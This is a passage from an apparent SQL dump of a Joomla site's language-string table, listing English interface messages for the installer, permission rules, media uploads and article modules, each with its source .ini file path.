Extension.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1930,'JLIB_INSTALLER_ERROR_TPL_UNINSTALL_INVALID_CLIENT','Template Uninstall: Invalid client.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1931,'JLIB_INSTALLER_ERROR_TPL_UNINSTALL_INVALID_NOTFOUND_MANIFEST','Template Uninstall: Manifest file invalid or not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1932,'JLIB_INSTALLER_ERROR_TPL_UNINSTALL_TEMPLATE_DEFAULT','Template Uninstall: Can\'t remove default template.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1933,'JLIB_INSTALLER_ERROR_TPL_UNINSTALL_TEMPLATE_DIRECTORY','Template Uninstall: Folder does not exist, can\'t remove files.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1934,'JLIB_INSTALLER_ERROR_TPL_UNINSTALL_TEMPLATE_ID_EMPTY','Template Uninstall: Template ID is empty, can\'t uninstall files.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1935,'JLIB_INSTALLER_ERROR_TPL_UNINSTALL_WARNCORETEMPLATE','Template Uninstall: Trying to uninstall a core template: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1936,'JLIB_INSTALLER_ERROR_UNKNOWN_CLIENT_TYPE','Unknown Client Type [%s]','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1937,'JLIB_INSTALLER_FILE_ERROR_MOVE','Error on moving file %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1938,'JLIB_INSTALLER_INCORRECT_SEQUENCE','Downgrading from version %1$s to version %2$s is not allowed.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1939,'JLIB_INSTALLER_INSTALL','Install','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1940,'JLIB_INSTALLER_MINIMUM_JOOMLA','You don\'t have the minimum Joomla version requirement of J%s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1941,'JLIB_INSTALLER_MINIMUM_PHP','Your server doesn\'t meet the minimum PHP version requirement of %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1942,'JLIB_INSTALLER_NOTICE_LANG_RESET_USERS','Language set to Default for %d users.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1943,'JLIB_INSTALLER_NOTICE_LANG_RESET_USERS_1','Language set to Default for %d user.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1944,'JLIB_INSTALLER_UNINSTALL','Uninstall','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1945,'JLIB_INSTALLER_UPDATE','Update','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1946,'JLIB_INSTALLER_ERROR_EXTENSION_INVALID_CLIENT_IDENTIFIER','Invalid client identifier specified in extension manifest.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1947,'JLIB_INSTALLER_ERROR_PACK_UNINSTALL_UNKNOWN_EXTENSION','Trying to uninstall unknown extension from package. This extension may have already been removed earlier.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1948,'JLIB_INSTALLER_NOT_ERROR','If the error is related to the installation of TinyMCE language files it has no effect on the installation of the language(s). Some language packs created prior to Joomla! 3.2.0 may try to install separate TinyMCE language files. As these are now included in the core they no longer need to be installed.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1949,'JLIB_INSTALLER_UPDATE_LOG_QUERY','Ran query from file %1$s. Query text: %2$s.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1950,'JLIB_INSTALLER_WARNING_UNABLE_TO_INSTALL_CONTENT_LANGUAGE','Unable to create a content language for %s language: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1951,'JLIB_JS_AJAX_ERROR_CONNECTION_ABORT','A connection abort has occurred while fetching the JSON data.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1952,'JLIB_JS_AJAX_ERROR_NO_CONTENT','No content was returned.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1953,'JLIB_JS_AJAX_ERROR_OTHER','An error has occurred while fetching the JSON data: HTTP %s status code.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1954,'JLIB_JS_AJAX_ERROR_PARSE','A parse error has occurred while processing the following JSON data:<br/><code style=\"color:inherit;white-space:pre-wrap;padding:0;margin:0;border:0;background:inherit;\">%s</code>','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1955,'JLIB_JS_AJAX_ERROR_TIMEOUT','A timeout has occurred while fetching the JSON data.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1956,'JLIB_LANGUAGE_ERROR_CANNOT_LOAD_METAFILE','Could not load %s language XML file from %s.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1957,'JLIB_LANGUAGE_ERROR_CANNOT_LOAD_METADATA','Could not load %s metadata from %s.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1958,'JLIB_LOGIN_AUTHORISATION','Your access has been authorised.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1959,'JLIB_LOGIN_DENIED','Your access has been denied.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1960,'JLIB_LOGIN_EXPIRED','Your authentication has expired.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1961,'JLIB_MAIL_FUNCTION_DISABLED','The mail() function has been disabled and the mail can\'t be sent.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1962,'JLIB_MAIL_FUNCTION_OFFLINE','The mail function has been disabled by an administrator.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1963,'JLIB_MAIL_INVALID_EMAIL_SENDER','JMail: : Invalid email Sender: %s, JMail: :setSender(%s).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1964,'JLIB_MEDIA_ERROR_UPLOAD_INPUT','Unable to upload file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1965,'JLIB_MEDIA_ERROR_WARNFILENAME','File name must only have alphanumeric characters and no spaces.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1966,'JLIB_MEDIA_ERROR_WARNFILETOOLARGE','This file is too large to upload.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1967,'JLIB_MEDIA_ERROR_WARNFILETYPE','This file type is not supported.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1968,'JLIB_MEDIA_ERROR_WARNIEXSS','Possible IE XSS Attack found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1969,'JLIB_MEDIA_ERROR_WARNINVALID_IMG','Not a valid image.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1970,'JLIB_MEDIA_ERROR_WARNINVALID_MIME','Invalid mime type detected.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1971,'JLIB_MEDIA_ERROR_WARNINVALID_MIMETYPE','Illegal mime type detected: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1972,'JLIB_MEDIA_ERROR_WARNNOTADMIN','Uploaded file is not an image file and you do not have permission.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1973,'JLIB_MENUS_PRESET_JOOMLA','Preset - Joomla','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1974,'JLIB_MENUS_PRESET_MODERN','Preset - Modern','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1975,'JLIB_NO_EDITOR_PLUGIN_PUBLISHED','Unable to display an editor because no editor plugin is published.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1976,'JLIB_PLUGIN_ERROR_LOADING_PLUGINS','Error loading Plugins: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1977,'JLIB_REGISTRY_EXCEPTION_LOAD_FORMAT_CLASS','Unable to load format class.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1978,'JLIB_RULES_ACTION','Action','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1979,'JLIB_RULES_ALLOWED','Allowed','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1980,'JLIB_RULES_ALLOWED_ADMIN','Allowed (Super User)','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1981,'JLIB_RULES_ALLOWED_INHERITED','Allowed (Inherited)','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1982,'JLIB_RULES_CALCULATED_SETTING','Calculated Setting','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1983,'JLIB_RULES_CONFLICT','Conflict','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1984,'JLIB_RULES_DATABASE_FAILURE','Failed storing the data to the database.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1985,'JLIB_RULES_DENIED','Denied','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1986,'JLIB_RULES_GROUP','%s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1987,'JLIB_RULES_GROUPS','Groups','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1988,'JLIB_RULES_INHERIT','Inherit','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1989,'JLIB_RULES_INHERITED','Inherited','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1990,'JLIB_RULES_NOT_ALLOWED','Not Allowed','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1991,'JLIB_RULES_NOT_ALLOWED_ADMIN_CONFLICT','Conflict','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1992,'JLIB_RULES_NOT_ALLOWED_DEFAULT','Not Allowed (Default)','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1993,'JLIB_RULES_NOT_ALLOWED_INHERITED','Not Allowed (Inherited)','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1994,'JLIB_RULES_NOT_ALLOWED_LOCKED','Not Allowed (Locked)','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1995,'JLIB_RULES_NOT_SET','Not Set','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1996,'JLIB_RULES_NOTICE_RECALCULATE_GROUP_PERMISSIONS','Super User permissions changed. Save or reload to recalculate this group permissions.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1997,'JLIB_RULES_NOTICE_RECALCULATE_GROUP_CHILDS_PERMISSIONS','Permissions changed in a group with child groups. Save or reload to recalculate the child groups permissions.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1998,'JLIB_RULES_REQUEST_FAILURE','Failed sending the data to server.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1999,'JLIB_RULES_SAVE_BEFORE_CHANGE_PERMISSIONS','Please save before changing permissions.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2000,'JLIB_RULES_SELECT_ALLOW_DENY_GROUP','Allow or deny %s for users in the %s group.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2001,'JLIB_RULES_SELECT_SETTING','Select New Setting','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2002,'JLIB_RULES_SETTING_NOTES','If you change the setting, it will apply to this and all child groups, components and content. Note that <em><strong>Denied</strong></em> will overrule any inherited setting and also the setting in any child group, component or content. In the case of a setting conflict, <em><strong>Deny</strong></em> will take precedence. <em><strong>Not Set</strong></em> is equivalent to <em><strong>Denied</strong></em> but can be changed in child groups, components and content.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2003,'JLIB_RULES_SETTING_NOTES_ITEM','If you change the setting, it will apply to this item. Note that:<br /><em><strong>Inherited</strong></em> means that the permissions from global configuration, parent group and category will be used.<br /><em><strong>Denied</strong></em> means that no matter what the global configuration, parent group or category settings are, the group being edited can\'t take this action on this item.<br /><em><strong>Allowed</strong></em> means that the group being edited will be able to take this action for this item (but if this is in conflict with the global configuration, parent group or category it will have no impact; a conflict will be indicated by <em><strong>Not Allowed (Inherited)</strong></em> under Calculated Settings).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2004,'JLIB_RULES_SETTINGS_DESC','Manage the permission settings for the user groups below. See notes at the bottom.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2005,'JLIB_STEMMER_INVALID_STEMMER','Invalid stemmer type %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2006,'JLIB_UNKNOWN','Unknown','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2007,'JLIB_UPDATER_ERROR_COLLECTION_FOPEN','The PHP allow_url_fopen setting is disabled. This setting must be enabled for the updater to work.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2008,'JLIB_UPDATER_ERROR_COLLECTION_OPEN_URL','Update: :Collection: Could not open %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2009,'JLIB_UPDATER_ERROR_COLLECTION_PARSE_URL','Update: :Collection: Could not parse %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2010,'JLIB_UPDATER_ERROR_EXTENSION_OPEN_URL','Update: :Extension: Could not open %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2011,'JLIB_UPDATER_ERROR_EXTENSION_PARSE_URL','Update: :Extension: Could not parse %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2012,'JLIB_UPDATER_ERROR_OPEN_UPDATE_SITE','Update: Could not open update site #%d "%s", URL: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2013,'JLIB_USER_ERROR_AUTHENTICATION_FAILED_LOAD_PLUGIN','JAuthentication: :authenticate: Failed to load plugin: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2014,'JLIB_USER_ERROR_AUTHENTICATION_LIBRARIES','JAuthentication: :__construct: Could not load authentication libraries.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2015,'JLIB_USER_ERROR_BIND_ARRAY','Unable to bind array to user object.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2016,'JLIB_USER_ERROR_CANNOT_CHANGE_SUPER_USER','A user is not allowed to change permissions of a Super User group.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2017,'JLIB_USER_ERROR_CANNOT_CHANGE_OWN_GROUPS','A user is not allowed to change permissions of their own group(s).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2018,'JLIB_USER_ERROR_CANNOT_CHANGE_OWN_PARENT_GROUPS','A user is not allowed to change permissions of their own group(s) parent group(s).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2019,'JLIB_USER_ERROR_CANNOT_DEMOTE_SELF','You can\'t remove your own Super User permissions.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2020,'JLIB_USER_ERROR_CANNOT_REUSE_PASSWORD','You can\'t reuse your current password, please enter a new password.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2021,'JLIB_USER_ERROR_ID_NOT_EXISTS','JUser: :_load: User %s does not exist.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2022,'JLIB_USER_ERROR_NOT_SUPERADMIN','Only users with Super User permissions can change other Super User user accounts.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2023,'JLIB_USER_ERROR_PASSWORD_NOT_MATCH','Passwords do not match. Please re-enter password.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2024,'JLIB_USER_ERROR_UNABLE_TO_FIND_USER','Unable to find a user with given activation string.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2025,'JLIB_USER_ERROR_UNABLE_TO_LOAD_USER','JUser: :_load: Unable to load user with ID: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2026,'JLIB_USER_EXCEPTION_ACCESS_USERGROUP_INVALID','User group does not exist.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2027,'JLIB_UTIL_ERROR_APP_INSTANTIATION','Application Startup Error.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2028,'JLIB_UTIL_ERROR_CONNECT_DATABASE','JDatabase: :getInstance: Could not connect to database <br />joomla.library: %1$s - %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2029,'JLIB_UTIL_ERROR_DOMIT','DommitDocument is deprecated. Use DomDocument instead.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2030,'JLIB_UTIL_ERROR_LOADING_FEED_DATA','Error loading feed data.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2031,'JLIB_UTIL_ERROR_XML_LOAD','Failed loading XML file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(2032,'LIB_JOOMLA','Joomla! Platform','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.sys.ini'),(2033,'LIB_JOOMLA_XML_DESCRIPTION','The Joomla! Platform is the Core of the Joomla! Content Management System.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.sys.ini'),(2034,'LIB_PHPASS','phpass','/home/smthsmth/public_html/language/en-GB/en-GB.lib_phpass.sys.ini'),(2035,'LIB_PHPASS_XML_DESCRIPTION','phpass is a portable password hashing framework for use in PHP applications. The preferred (most secure) hashing method supported by phpass is the OpenBSD-style bcrypt (known in PHP as CRYPT_BLOWFISH), with a fallback to BSDI-style extended DES-based hashes (known in PHP as CRYPT_EXT_DES) and a last resort fallback to an MD5-based variable iteration count password hashing method implemented in phpass itself.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_phpass.sys.ini'),(2036,'LIB_PHPUTF8','phputf8','/home/smthsmth/public_html/language/en-GB/en-GB.lib_phputf8.sys.ini'),(2037,'LIB_PHPUTF8_XML_DESCRIPTION','Classes for UTF-8.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_phputf8.sys.ini'),(2038,'LIB_SIMPLEPIE_XML_DESCRIPTION','PHP based RSS and Atom Feed Framework.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_simplepie.sys.ini'),(2039,'MOD_ARTICLES_ARCHIVE','Articles - Archived','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_archive.ini'),(2040,'MOD_ARTICLES_ARCHIVE_FIELD_COUNT_LABEL','# of Months','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_archive.ini'),(2041,'MOD_ARTICLES_ARCHIVE_FIELD_COUNT_DESC','The number of months to display (the default is 10).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_archive.ini'),(2042,'MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION','This module shows a list of the calendar months with archived articles. After you have changed the status of an article to archived, this list will be automatically generated.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_archive.ini'),(2043,'MOD_ARTICLES_ARCHIVE_DATE','%1$s, %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_archive.ini'),(2044,'MOD_ARTICLES_ARCHIVE','Articles - Archived','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_archive.sys.ini'),(2045,'MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION','This module shows a list of the calendar months with Archived Articles. After you have changed the status of an Article to Archived, this list will be automatically generated.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_archive.sys.ini'),(2046,'MOD_ARTICLES_ARCHIVE_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_archive.sys.ini'),(2047,'MOD_ARTICLES_CATEGORIES','Articles - Categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2048,'MOD_ARTICLES_CATEGORIES_FIELD_COUNT_DESC','Select the number of first level subcategories to display. Default is all.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2049,'MOD_ARTICLES_CATEGORIES_FIELD_COUNT_LABEL','# First Subcategories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2050,'MOD_ARTICLES_CATEGORIES_FIELD_MAXLEVEL_DESC','Select the maximum level depth for each subcategory. Default is all.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2051,'MOD_ARTICLES_CATEGORIES_FIELD_MAXLEVEL_LABEL','Maximum Level Depth','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2052,'MOD_ARTICLES_CATEGORIES_FIELD_PARENT_DESC','Choose a parent category.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2053,'MOD_ARTICLES_CATEGORIES_FIELD_PARENT_LABEL','Parent Category','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2054,'MOD_ARTICLES_CATEGORIES_FIELD_SHOW_CHILDREN_DESC','Show or hide subcategories.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2055,'MOD_ARTICLES_CATEGORIES_FIELD_SHOW_CHILDREN_LABEL','Show Subcategories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2056,'MOD_ARTICLES_CATEGORIES_FIELD_NUMITEMS_DESC','Show or hide number of articles.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2057,'MOD_ARTICLES_CATEGORIES_FIELD_NUMITEMS_LABEL','Show Number of Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2058,'MOD_ARTICLES_CATEGORIES_FIELD_SHOW_DESCRIPTION_DESC','Show or hide category descriptions.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2059,'MOD_ARTICLES_CATEGORIES_FIELD_SHOW_DESCRIPTION_LABEL','Category Descriptions','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2060,'MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION','This module displays a list of categories from one parent category.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2061,'MOD_ARTICLES_CATEGORIES_TITLE_HEADING_LABEL','Heading Style','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2062,'MOD_ARTICLES_CATEGORIES_TITLE_HEADING_DESC','Set the heading style to use.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.ini'),(2063,'MOD_ARTICLES_CATEGORIES','Articles - Categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.sys.ini'),(2064,'MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION','This module displays a list of categories from one parent category.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.sys.ini'),(2065,'MOD_ARTICLES_CATEGORIES_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_categories.sys.ini'),(2066,'MOD_ARTICLES_CATEGORY','Articles - Category','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2067,'MOD_ARTICLES_CATEGORY_FIELD_ARTICLEGROUPING_DESC','Select how you would like the articles to be grouped.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2068,'MOD_ARTICLES_CATEGORY_FIELD_ARTICLEGROUPING_LABEL','Article Grouping','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2069,'MOD_ARTICLES_CATEGORY_FIELD_ARTICLEGROUPINGDIR_DESC','Select the direction you would like the Article Groupings to be ordered by.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2070,'MOD_ARTICLES_CATEGORY_FIELD_ARTICLEGROUPINGDIR_LABEL','Grouping Direction','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2071,'MOD_ARTICLES_CATEGORY_FIELD_ARTICLEORDERING_DESC','Select which field you would like Articles to be ordered by. Featured Ordering should only be used when Filtering Option for Featured Articles is set to \'Only\'.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2072,'MOD_ARTICLES_CATEGORY_FIELD_ARTICLEORDERING_LABEL','Article Field to Order By','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2073,'MOD_ARTICLES_CATEGORY_FIELD_ARTICLEORDERINGDIR_DESC','Select the direction you would like Articles to be ordered by.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2074,'MOD_ARTICLES_CATEGORY_FIELD_ARTICLEORDERINGDIR_LABEL','Ordering Direction','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2075,'MOD_ARTICLES_CATEGORY_FIELD_AUTHOR_DESC','Select one or more authors from the list below.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2076,'MOD_ARTICLES_CATEGORY_FIELD_AUTHOR_LABEL','Authors','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2077,'MOD_ARTICLES_CATEGORY_FIELD_AUTHORALIAS_DESC','Select one or more author aliases from the list below.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2078,'MOD_ARTICLES_CATEGORY_FIELD_AUTHORALIAS_LABEL','Author Aliases','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2079,'MOD_ARTICLES_CATEGORY_FIELD_AUTHORALIASFILTERING_DESC','Select Inclusive to Include the Selected Author Aliases, Exclusive to Exclude the Selected Author Aliases.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2080,'MOD_ARTICLES_CATEGORY_FIELD_AUTHORALIASFILTERING_LABEL','Author Alias Filtering Type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2081,'MOD_ARTICLES_CATEGORY_FIELD_AUTHORFILTERING_DESC','Select Inclusive to Include the Selected Authors, Exclusive to Exclude the Selected Authors.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2082,'MOD_ARTICLES_CATEGORY_FIELD_AUTHORFILTERING_LABEL','Author Filtering Type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2083,'MOD_ARTICLES_CATEGORY_FIELD_CATDEPTH_DESC','The number of child category levels to return.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2084,'MOD_ARTICLES_CATEGORY_FIELD_CATDEPTH_LABEL','Category Depth','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2085,'MOD_ARTICLES_CATEGORY_FIELD_CATEGORY_DESC','Please select one or more categories.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2086,'MOD_ARTICLES_CATEGORY_FIELD_CATFILTERINGTYPE_DESC','Select Inclusive to Include the Selected Categories, Exclusive to Exclude the Selected Categories.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2087,'MOD_ARTICLES_CATEGORY_FIELD_CATFILTERINGTYPE_LABEL','Category Filtering Type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2088,'MOD_ARTICLES_CATEGORY_FIELD_COUNT_DESC','The number of items to display. The default value of 0 will display all articles.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2089,'MOD_ARTICLES_CATEGORY_FIELD_COUNT_LABEL','Count','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2090,'MOD_ARTICLES_CATEGORY_FIELD_DATERANGEFIELD_DESC','Select which date field you want the date range to be applied to.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2091,'MOD_ARTICLES_CATEGORY_FIELD_DATERANGEFIELD_LABEL','Date Range Field','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2092,'MOD_ARTICLES_CATEGORY_FIELD_DATEFIELD_DESC','Select which date field you want to display.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2093,'MOD_ARTICLES_CATEGORY_FIELD_DATEFIELD_LABEL','Date Field','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2094,'MOD_ARTICLES_CATEGORY_FIELD_DATEFIELDFORMAT_DESC','Please enter in a valid date format. See: https://php.net/date for formatting information.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2095,'MOD_ARTICLES_CATEGORY_FIELD_DATEFIELDFORMAT_LABEL','Date Format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_articles_category.ini'),(2096,'MOD_ARTICLES_CATEGORY_FIELD_DATEFILTERING_DESC','Select Date Filtering 